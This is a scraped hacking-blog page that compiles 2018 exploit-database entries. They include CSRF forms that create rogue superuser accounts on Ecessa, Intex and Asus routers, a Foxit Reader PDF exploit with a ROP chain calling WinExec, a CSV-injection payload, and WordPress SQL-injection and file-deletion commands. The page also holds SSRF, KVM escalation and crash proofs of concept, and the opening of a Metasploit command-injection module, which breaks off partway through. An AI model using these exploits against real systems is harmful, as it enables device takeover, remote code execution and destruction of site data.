# Exploit Title: Ecessa Edge EV150 10.7.4 - Cross-Site Request Forgery (Add Superuser)
# Author: LiquidWorm
# Date: 2018-05-21
# Vendor: Ecessa Corporation
# Product web page: https://www.ecessa.com
# Affected version: 10.7.4, 10.6.9, 10.6.5.2, 10.5.4, 10.2.24, 9.2.24
# Tested on: lighttpd/1.4.35
# Summary: Internet Failover and Load Balancing for Small Businesses, Stores
# and Branch Offices.
# Desc: The application interface allows users to perform certain actions via
# HTTP requests without performing any validity checks to verify the requests.
# This can be exploited to perform certain actions with administrative privileges
# if a logged-in user visits a malicious web site.
<html>
<body>
<form action="https://Target/cgi-bin/pl_web.cgi/util_configlogin_act" method="POST">
<input type="hidden" name="savecrtcfg" value="checked" />
<input type="hidden" name="user_username1" value="root" />
<input type="hidden" name="user_enabled1" value="on" />
<input type="hidden" name="user_passwd1" value="" />
<input type="hidden" name="user_passwd_verify1" value="" />
<input type="hidden" name="user_delete1" value="" />
<input type="hidden" name="user_username2" value="admin" />
<input type="hidden" name="user_passwd2" value="" />
<input type="hidden" name="user_passwd_verify2" value="" />
<input type="hidden" name="user_delete2" value="" />
<input type="hidden" name="user_username3" value="user" />
<input type="hidden" name="user_enabled3" value="on" />
<input type="hidden" name="user_passwd3" value="" />
<input type="hidden" name="user_passwd_verify3" value="" />
<input type="hidden" name="user_delete3" value="" />
<input type="hidden" name="user_username4" value="h4x0r" />
<input type="hidden" name="user_enabled4" value="on" />
<input type="hidden" name="user_superuser4" value="on" />
<input type="hidden" name="user_passwd4" value="123123" />
<input type="hidden" name="user_passwd_verify4" value="123123" />
<input type="hidden" name="users_num" value="4" />
<input type="hidden" name="page" value="util_configlogin" />
<input type="hidden" name="val_requested_page" value="user_accounts" />
<input type="hidden" name="savecrtcfg" value="checked" />
<input type="hidden" name="page_uuid" value="3e2774f9-1cd3-4d36-a91e-eb9e42b5ba0d" />
<input type="hidden" name="form_has_changed" value="1" />
<input type="submit" value="Supersize!" />
</form>
</body>
</html>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863571751
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit title: Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser)
# Date: 2018-05-21
# Author: LiquidWorm
# Vendor: Ecessa Corporation
# Product web page: https://www.ecessa.com
# Affected version: 10.7.4, 10.6.9, 10.7.4, 10.6.5.2, 10.5.4, 10.2.24, 9.2.24
# Summary: Ecessa's WANworX SD-WAN solutions increase network performance and
# reliability by leveraging any connection. That can be premium priced MPLS,
# lower cost broadband, or cellular 4G or LTE. Many of today’s WAN deployments
# are based on older technology that was acceptable when businesses did not run
# at breakneck speed or when operations didn’t grind to a halt when connectivity
# was disrupted. In today’s cloud-based applications, datacenters and distributed
# networks, where so much is virtualized and delivered as–a-service, limited
# bandwidth and network outages don’t just slow productivity, they stop it.
# Desc: The application interface allows users to perform certain actions via
# HTTP requests without performing any validity checks to verify the requests.
# This can be exploited to perform certain actions with administrative privileges
# if a logged-in user visits a malicious web site.
<html>
<body>
<form action="https://127.0.0.1/cgi-bin/pl_web.cgi/util_configlogin_act" method="POST">
<input type="hidden" name="savecrtcfg" value="checked" />
<input type="hidden" name="user_username1" value="root" />
<input type="hidden" name="user_enabled1" value="on" />
<input type="hidden" name="user_passwd1" value="" />
<input type="hidden" name="user_passwd_verify1" value="" />
<input type="hidden" name="user_delete1" value="" />
<input type="hidden" name="user_username2" value="admin" />
<input type="hidden" name="user_passwd2" value="" />
<input type="hidden" name="user_passwd_verify2" value="" />
<input type="hidden" name="user_delete2" value="" />
<input type="hidden" name="user_username3" value="user" />
<input type="hidden" name="user_enabled3" value="on" />
<input type="hidden" name="user_passwd3" value="" />
<input type="hidden" name="user_passwd_verify3" value="" />
<input type="hidden" name="user_delete3" value="" />
<input type="hidden" name="user_username4" value="h4x0r" />
<input type="hidden" name="user_enabled4" value="on" />
<input type="hidden" name="user_superuser4" value="on" />
<input type="hidden" name="user_passwd4" value="123123" />
<input type="hidden" name="user_passwd_verify4" value="123123" />
<input type="hidden" name="users_num" value="4" />
<input type="hidden" name="page" value="util_configlogin" />
<input type="hidden" name="val_requested_page" value="user_accounts" />
<input type="hidden" name="savecrtcfg" value="checked" />
<input type="hidden" name="page_uuid" value="73f90fa3-2e60-4fd7-a792-1ff6c7513d92" />
<input type="hidden" name="form_has_changed" value="1" />
<input type="submit" value="Supersize!" />
</form>
</body>
</html>
# Exploit Title: DIGISOL DG-BR4000NG - Cross-Site Scripting
# Date: 2018-06-24
# Vendor Homepage: http://www.digisol.com
# Hardware Link: https://www.amazon.in/Digisol-DG-BR4000NG-Wireless-Broadband-802-11n/dp/B00A19EHYK
# Category: Hardware
# Exploit Author: Adipta Basu
# Contact : https://www.facebook.com/AdiptaBasu
# Web: https://hackings8n.blogspot.com
# Tested on: Mac OS High Sierra
# CVE: CVE-2018-12705
# Reproduction Steps:
- Goto your Wifi Router Gateway [i.e: http://192.168.2.1]
- Go to --> "General Setup" --> "Wireless" --> "Basic Settings"
- Open BurpSuite
- Change the SSID to "Testing" and hit "Apply"
- Burp will capture the intercepts.
- Now change the SSID to <script>alert("ADIPTA")</script>
- Refresh the page, and you will get the "ADIPTA" pop-up
# Exploit Title: DIGISOL DG-BR4000NG - Buffer Overflow (PoC)
# Date 2018-06-24
# Vendor Homepage† http://www.digisol.com
# Hardware Link httpswww.amazon.inDigisol-DG-BR4000NG-Wireless-Broadband-802-11ndpB00A19EHYK
# Version: DIGISOL DG-BR4000NG Wireless Router
# Category Hardware
# Exploit Author Adipta Basu
# Tested on Mac OS High Sierra
# CVE CVE-2018-12706
# Reproduction Steps
- Goto your Wifi Router Gateway [i.e http192.168.2.1]
- Go to -- General Setup -- Wireless -- Basic Settings
- Open BurpSuite
- Reload the Page
- Burp will capture the intercepts.
- Add a string of 500 ì0îs after the Authorization Basic string
- The router will restart.
- Refresh the page, and the whole web interface will be faulty.
# Exploit Title: Intex Router N-150 - Cross-Site Request Forgery (Add Admin)
# Date: 2018-06-23
# Exploit Author: Navina Asrani
# Version: N-150
# CVE : N/A
# Category: Router Firmware
# 1. Description
# The firmware allows malicious request to be executed without verifying
# source of request. This leads to arbitrary execution with malicious request
# which will lead to the creation of a privileged user..
# 2. Proof of Concept
# Visit the application
# Go to any router setting modification page and change the values,
# create a request and observe the lack of CSRF tokens.
# Craft an html page with all the details for the built-in admin
# user creation and host it on a server
# Upon the link being clicked by a logged in admin user,
# immediately, the action will get executed
# Exploitation Technique: A attacker can create a rogue admin user to gain
# access to the application.
# Exploit code:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.0.1/goform/WizardHandle" method="POST">
<input type="hidden" name="GO" value="index.asp" />
<input type="hidden" name="v12_time" value="1529768448.425" />
<input type="hidden" name="WANT1" value="3" />
<input type="hidden" name="isp" value="3" />
<input type="hidden" name="PUN" value="testuser_k" />
<input type="hidden" name="PPW" value="123456" />
<input type="hidden" name="SSID" value="testwifiap" />
<input type="hidden" name="wirelesspassword" value="00000000" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password)
# Date: 2018-06-23
# Exploit Author: Wadeek
# Vendor Homepage: https://www.asus.com/
# Firmware Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-AC750GF/FW_RT_AC750GF_30043806038.zip
# Firmware Version: 3.0.0.4.380.6038
# Tested on: ASUS RT-AC750GF with default firmware version 3.0.0.4.380.6038
# (Cross Site Scripting -> URL Redirecting -> Cross-Site Request Forgery {Cookie: asus_token}
# -> Change the router login password and enable SSH daemon)
<html>
<body>
<p>Proof Of Concept</p>
<!-- <form action="http://192.168.1.1/findasus.cgi" method="POST"> -->
<form action="http://router.asus.com/findasus.cgi" method="POST">
<input type="hidden" name="action_mode" value="refresh_networkmap" />
<input type="text" id="current_page" name="current_page" value="" />
<script>
// set username at admin
// set password at admin123
// enable ssh daemon
document.getElementById("current_page").value = "start_apply.htm?productid=RT-AC53¤t_page=Advanced_System_Content.asp&next_page=Advanced_System_Content.asp&modified=0&action_mode=apply&action_wait=5&action_script=restart_time%3Brestart_upnp&http_username=admin&http_passwd=admin123&http_passwd2=admin123&v_password2=admin123&sshd_enable=1&sshd_port=22&sshd_pass=1&sshd_authkeys=";
</script>
<input type="submit" value="" />
</form>
</body>
</html>
# Exploit Title: Wordpress Plugin Comments Import & Export < 2.0.4 - CSV Injection
# Google Dork: N/A
# Date: 2018-06-24
# Exploit Author: Bhushan B. Patil
# Software Link: https://wordpress.org/plugins/comments-import-export-woocommerce/
# Affected Version: 2.0.4 and before
# Category: Plugins and Extensions
# Tested on: WiN7_x64
# CVE: CVE-2018-11526
# 1. Application Description:
# Comments Import Export Plugin helps you to easily export and import Article and Product Comments in your store.
# 2. Technical Description:
# WordPress Comments Import & Export plugin version 2.0.4 and before are affected by the vulnerability Remote Command Execution
# using CSV Injection. This allows a public user to inject commands as a part of form fields and when a user with
# higher privilege exports the form data in CSV opens the file on their machine, the command is executed.
# 3. Proof Of Concept:
Enter the payload @SUM(1+1)*cmd|' /C calc'!A0 in the form fields and submit.
When high privileged user logs into the application to export form data in CSV and opens the file.
Formula gets executed and calculator will get popped in his machine.
%PDF
1 0 obj
<</Pages 1 0 R /OpenAction 2 0 R>>
2 0 obj
<</S /JavaScript /JS (
/*
Foxit Reader Remote Code Execution Exploit
==========================================
Written by: Steven Seeley (mr_me) of Source Incite
Date: 22/06/2018
Technical details: https://srcincite.io/blog/2018/06/22/foxes-among-us-foxit-reader-vulnerability-discovery-and-exploitation.html
Download: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English
Target version: Foxit Reader v9.0.1.1049 (sha1: e3bf26617594014f4af2ef2b72b4a86060ec229f)
Tested on:
1. Windows 7 Ultimate x86 build 6.1.7601 sp1
2. Windows 10 Pro x86 v1803 build 10.0.17134
Vulnerabilities leveraged:
1. CVE-2018-9948
2. CVE-2018-9958
*/
var heap_ptr = 0;
var foxit_base = 0;
var pwn_array = [];
function prepare_heap(size){
/*
This function prepares the heap state between allocations
and frees to get a predictable memory address back.
*/
var arr = new Array(size);
for(var i = 0; i < size; i++){
arr[i] = this.addAnnot({type: "Text"});;
if (typeof arr[i] == "object"){
arr[i].destroy();
}
}
}
function gc() {
/*
This is a simple garbage collector, written by the notorious @saelo
Greetz, mi amigo.
*/
const maxMallocBytes = 128 * 0x100000;
for (var i = 0; i < 3; i++) {
var x = new ArrayBuffer(maxMallocBytes);
}
}
function alloc_at_leak(){
/*
This is the function that allocates at the leaked address
*/
for (var i = 0; i < 0x64; i++){
pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
}
}
function control_memory(){
/*
This is the function that fills the memory address that we leaked
*/
for (var i = 0; i < 0x64; i++){
for (var j = 0; j < pwn_array[i].length; j++){
pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
}
}
}
function leak_vtable(){
/*
Foxit Reader Typed Array Uninitialized Pointer Information Disclosure Vulnerability
ZDI-CAN-5380 / ZDI-18-332 / CVE-2018-9948
Found by: bit from meepwn team
*/
// alloc
var a = this.addAnnot({type: "Text"});
// free
a.destroy();
gc();
// kinda defeat lfh randomization in win 10
prepare_heap(0x400);
// reclaim
var test = new ArrayBuffer(0x60);
var stolen = new Int32Array(test);
// leak the vtable
var leaked = stolen[0] & 0xffff0000;
// a hard coded offset to FoxitReader.exe base v9.0.1.1049 (a01a5bde0699abda8294d73544a1ec6b4115fa68)
foxit_base = leaked - 0x01f50000;
}
function leak_heap_chunk(){
/*
Foxit Reader Typed Array Uninitialized Pointer Information Disclosure Vulnerability
ZDI-CAN-5380 / ZDI-18-332 / CVE-2018-9948
Found by: bit from meepwn team
*/
// alloc
var a = this.addAnnot({type: "Text"});
// free
a.destroy();
// kinda defeat lfh randomization in win 10
prepare_heap(0x400);
// reclaim
var test = new ArrayBuffer(0x60);
var stolen = new Int32Array(test);
// alloc at the freed location
alloc_at_leak();
// leak a heap chunk of size 0x40
heap_ptr = stolen[1];
}
function reclaim(){
/*
This function reclaims the freed chunk, so we can get rce and I do it a few times for reliability.
All gadgets are from FoxitReader.exe v9.0.1.1049 (a01a5bde0699abda8294d73544a1ec6b4115fa68)
*/
var arr = new Array(0x10);
for (var i = 0; i < arr.length; i++) {
arr[i] = new ArrayBuffer(0x60);
var rop = new Int32Array(arr[i]);
rop[0x00] = heap_ptr; // pointer to our stack pivot from the TypedArray leak
rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
rop[0x02] = 0x72727272; // junk
rop[0x03] = foxit_base + 0x00001450 // pop ebp; ret
rop[0x04] = 0xffffffff; // ret of WinExec
rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
rop[0x0a] = foxit_base + 0x0041c6ca; // ret
rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
rop[0x0c] = 0x636c6163; // calc
rop[0x0d] = 0x00000000; // adios, amigo
for (var j = 0x0e; j < rop.length; j++) {
rop[j] = 0x71727374;
}
}
}
function trigger_uaf(){
/*
Foxit Reader Text Annotations point Use-After-Free Remote Code Execution Vulnerability
ZDI-CAN-5620 / ZDI-18-342 / CVE-2018-9958
Found by: Steven Seeley (mr_me) of Source Incite
*/
var that = this;
var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
var arr = [1];
Object.defineProperties(arr,{
"0":{
get: function () {
// free
that.getAnnot(0, "uaf").destroy();
// reclaim freed memory
reclaim();
return 1;
}
}
});
// re-use
a.point = arr;
}
function main(){
// 1. Leak a heap chunk of size 0x40
leak_heap_chunk();
// 2. Leak vtable and calculate the base of Foxit Reader
leak_vtable();
// 3. Then fill the memory region from step 1 with a stack pivot
control_memory();
// 4. Trigger the uaf, reclaim the memory, pivot to rop and win
trigger_uaf();
}
if (app.platform == "WIN"){
if (app.isFoxit == "Foxit Reader"){
if (app.appFoxitVersion == "9.0.1.1049"){
main();
}
}
}
)>> trailer <</Root 1 0 R>>
# Exploit Title: Ecessa ShieldLink SL175EHQ 10.7.4 - Cross-Site Request Forgery (Add Superuser)
# Date: 2018-05-21
# Vendor: Ecessa Corporation
# Product web page: https://www.ecessa.com
# Affected version: 10.7.4, 10.6.9, 10.7.4, 10.6.5.2, 10.5.4, 10.2.24, 9.2.24
# Summary: Ecessa's ShieldLink 60, 175, 600,1200 & 4000 are advanced, yet highly
# affordable secure WAN Optimization Controllers that incorporate all of the ISP/WAN
# link.
# Desc: The application interface allows users to perform certain actions via
# HTTP requests without performing any validity checks to verify the requests.
# This can be exploited to perform certain actions with administrative privileges
# if a logged-in user visits a malicious web site.
<html>
<body>
<form action="https://127.0.0.1/cgi-bin/pl_web.cgi/util_configlogin_act" method="POST">
<input type="hidden" name="savecrtcfg" value="checked" />
<input type="hidden" name="user_username1" value="root" />
<input type="hidden" name="user_enabled1" value="on" />
<input type="hidden" name="user_passwd1" value="" />
<input type="hidden" name="user_passwd_verify1" value="" />
<input type="hidden" name="user_delete1" value="" />
<input type="hidden" name="user_username2" value="admin" />
<input type="hidden" name="user_passwd2" value="" />
<input type="hidden" name="user_passwd_verify2" value="" />
<input type="hidden" name="user_delete2" value="" />
<input type="hidden" name="user_username3" value="user" />
<input type="hidden" name="user_enabled3" value="on" />
<input type="hidden" name="user_passwd3" value="" />
<input type="hidden" name="user_passwd_verify3" value="" />
<input type="hidden" name="user_delete3" value="" />
<input type="hidden" name="user_username4" value="h4x0r" />
<input type="hidden" name="user_enabled4" value="on" />
<input type="hidden" name="user_superuser4" value="on" />
<input type="hidden" name="user_passwd4" value="123123" />
<input type="hidden" name="user_passwd_verify4" value="123123" />
<input type="hidden" name="users_num" value="4" />
<input type="hidden" name="page" value="util_configlogin" />
<input type="hidden" name="val_requested_page" value="user_accounts" />
<input type="hidden" name="savecrtcfg" value="checked" />
<input type="hidden" name="page_uuid" value="df220e51-db68-492e-a745-d14adfd2f4fb" />
<input type="hidden" name="form_has_changed" value="1" />
<input type="submit" value="Supersize!" />
</form>
</body>
</html>
# Exploit Title: Intex Router N-150 - Arbitrary File Upload
# Date: 2018-06-23
# Exploit Author: Samrat Das
# Version: N-150
# CVE : N/A
# Category: Router Firmware
# 1. Description
# The firmware allows malicious files to be uploaded without any checking of
# extensions and allows filed to be uploaded.
# 2. Proof of Concept
- Visit the application
- Go to the advanced settings post login
- Under backup- restore page upload any random file extension and hit go.
- Upon the file being upload, the firmware will get rebooted accepting the arbitrary file.
# Exploit Title: WordPress Plugin iThemes Security(better-wp-security) <= 7.0.2 - Authenticated SQL Injection
# Date: 2018-06-25
# Exploit Author: Çlirim Emini
# Website: https://www.sentry.co.com/
# Vendor Homepage: https://ithemes.com/
# Software Link: https://wordpress.org/plugins/better-wp-security/
# Version/s: 7.0.2 and below
# Patched Version: 7.0.3
# CVE : 2018-12636
# WPVULNDB: https://wpvulndb.com/vulnerabilities/9099
Plugin description:
iThemes Security works to lock down WordPress, fix common holes, stop automated attacks and strengthen user credentials. With advanced features for experienced users, this WordPress security plugin can help harden WordPress.
Description:
WordPress Plugin iThemes Security(better-wp-security) before 7.0.3 allows remote authenticated users to execute arbitrary SQL commands via the 'orderby' parameter in the 'itsec-logs' page to wp-admin/admin.php.
Technical details:
Parameter orderby is vulnerable because backend variable $sort_by_column
is not escaped.
File: better-wp-security/core/admin-pages/logs-list-table.php
Line 271: if ( isset( $_GET[' orderby '], $_GET['order'] ) ) {
Line 272: $ sort_by_column = $_GET[' orderby '];
File: better-wp-security/core/lib/log-util.php
Line 168: $query .= ' ORDER BY ' . implode( ', ', $ sort_by_column ));
Proof of Concept (PoC):
The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin:
http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip%2c(select*from(select(sleep(10)))a)&order=asc&paged=0
Using SQLMAP:
sqlmap -u 'http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip*&order=asc&paged=0' --cookie "wordpress_b...; wordpress_logged_in_bbf...;" --string "WordPress" --dbms=MySQL --technique T --level 5 --risk 3
# Exploit Title: Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability
# Date: 2018-06-27
# Exploit Author: VulnSpy
# Vendor Homepage: http://www.wordpress.org
# Software Link: http://www.wordpress.org/download
# Version: <= 4.9.6
# Tested on: php7 mysql5
# CVE :
Step 1:
```
curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'
```
Step 2:
```
curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'
```
REF:
Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability Exploit - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
WARNING: WordPress File Delete to Code Execution - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
# Exploit Title: PoDoFo 0.9.5 - Stack-Based Buffer Overflow (PoC)
# Date: 25.06.2018
# Software Link: https://sourceforge.net/projects/podofo/
# Vuln Version: 0.9.5
# CVE: cve-2018-8002
# Vulnerability Details: https://bugzilla.redhat.com/show_bug.cgi?id=1548930
# Exploit Author: r4xis
https://github.com/r4xis
exploit
-------------
podofo 0.9.3 (tested on ubuntu 16.04 32 bit)
$ python -c 'print "%PDF- 1 0 obj<<" + "["*50000' > poc.pdf;podofopdfinfo poc.pdf
podofo 0.9.4 (tested on debian 9.4 64 bit)
$ python -c 'print "%PDF- 1 0 obj" + "["*50000 + "startxref 5%%EOF"' > poc.pdf ;podofopdfinfo poc.pdf
podofo 0.9.5 (tested on ubuntu 18.04 64 bit)
$ python -c 'print "%PDF- 1 0 obj" + "["*50000 + "startxref 5%%EOF"' > poc.pdf ;podofopdfinfo poc.pdf
Note: Also you can use "<<" characters;
$ python -c 'print "%PDF- 1 0 obj" + "<<"*50000 + "startxref 5%%EOF"' > poc.pdf ;podofopdfinfo poc.pdf
reason
-----------
Recursive functions call to each others, until the stack overflow.
backtrace
-----------
for "[" chars;
...
#28 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#29 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
from /usr/lib/libpodofo.so.0.9.5
#30 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#31 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
from /usr/lib/libpodofo.so.0.9.5
#32 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#33 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
from /usr/lib/libpodofo.so.0.9.5
#34 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#35 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
from /usr/lib/libpodofo.so.0.9.5
#36 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#37 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
from /usr/lib/libpodofo.so.0.9.5
#38 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#39 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
from /usr/lib/libpodofo.so.0.9.5
#40 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#41 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
from /usr/lib/libpodofo.so.0.9.5
#42 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#43 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
from /usr/lib/libpodofo.so.0.9.5
#44 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#45 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
from /usr/lib/libpodofo.so.0.9.5
#46 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#47 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
from /usr/lib/libpodofo.so.0.9.5
#48 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#49 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
...
1. ADVISORY INFORMATION
========================================
Title: Liferay Portal < 7.0.4 Blind Server-Side Request Forgery
Application: osTicket
Remotely Exploitable: Yes
Authentication Required: NO
Versions Affected: <= 7.0.4
Technology: Java
Vendor URL: liferay.com
Date of found: 04 December 2017
Disclosure: 25 June 2018
Author: Mehmet Ince
2. CREDIT
========================================
This vulnerability was identified during penetration test
by Mehmet INCE from PRODAFT / INVICTUS
3. Technical Details & POC
========================================
POST /xmlrpc/pingback HTTP/1.1
Host: mehmetince.dev:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/47.0.2526.73 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 361
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value>http://TARGET/</value>
</param>
<param>
<value>http://mehmetince.dev:8080/web/guest/home/-/blogs/30686</value>
</param>
</params>
</methodCall>
When KVM (on Intel) virtualizes another hypervisor as L1 VM it does not verify that VMX instructions from the L1 VM (which trigger a VM exit and are emulated by L0 KVM) are coming from ring 0.
For code running on bare metal or VMX root mode this is enforced by hardware. However, for code running in L1, the instruction always triggers a VM exit even when executed with cpl 3. This behavior is documented by Intel (example is for the VMPTRST instruction):
(Intel Manual 30-18 Vol. 3C)
IF (register operand) or (not in VMX operation) or (CR0.PE = 0) or (RFLAGS.VM = 1) or (IA32_EFER.LMA = 1 and CS.L = 0)
THEN #UD;
ELSIF in VMX non-root operation
THEN VMexit;
ELSIF CPL > 0
THEN #GP(0);
ELSE
64-bit in-memory destination operand ← current-VMCS pointer;
This means that a normal user space program running in the L1 VM can trigger KVMs VMX emulation which gives a large number of privilege escalation vectors (fake VMCS or vmptrld / vmptrst to a kernel address are the first that come to mind). As VMX emulation code checks for the guests CR4.VMXE value this only works if a L2 guest is running.
A somewhat realistic exploit scenario would involve someone breaking out of a L2 guest (for example by exploiting a bug in the L1 qemu process) and then using this bug for privilege escalation on the L1 system.
Simple POC (tested on L0 and L1 running Ubuntu 18.04 4.15.0-22-generic).
This requires that a L2 guest exists:
echo 'main(){asm volatile ("vmptrst 0xffffffffc0031337");}'| gcc -xc - ; ./a.out
[ 2537.280319] BUG: unable to handle kernel paging request at ffffffffc0031337
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Quest KACE Systems Management Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in Quest KACE
Systems Management Appliance version 8.0.318 (and possibly prior).
The `download_agent_installer.php` file allows unauthenticated users
to execute arbitrary commands as the web server user `www`.
A valid Organization ID is required. The default value is `1`.
A valid Windows agent version number must also be provided. If file
sharing is enabled, the agent versions are available within the
`\\kace.local\client\agent_provisioning\windows_platform` Samba share.
Additionally, various agent versions are listed on the KACE website.
This module has been tested successfully on Quest KACE Systems
Management Appliance K1000 version 8.0 (Build 8.0.318).
},
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => 'unix', # FreeBSD
'Arch' => ARCH_CMD,
'DisclosureDate' => 'May 31 2018',
'Author' =>
[
'Leandro Barragan', # Discovery and PoC
'Guido Leo', # Discovery and PoC
'Brendan Coles', # Metasploit
],
'References' =>
[
['CVE', '2018-11138'],
['URL', 'https://support.quest.com/product-notification/noti-00000134'],
['URL', 'https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities']
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x27",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl'
}
},
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0))
register_options [
OptString.new('SERIAL', [false, 'Serial number', '']),
OptString.new('ORGANIZATION', [true, 'Organization ID', '1']),
OptString.new('AGENT_VERSION', [true, 'Windows agent version', '8.0.152'])
]
end
def check
res = send_request_cgi('uri' => normalize_uri('common', 'download_agent_installer.php'))
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
unless res.code == 302 && res.headers.to_s.include?('X-KACE-Appliance')
vprint_status 'Remote host is not a Quest KACE appliance'
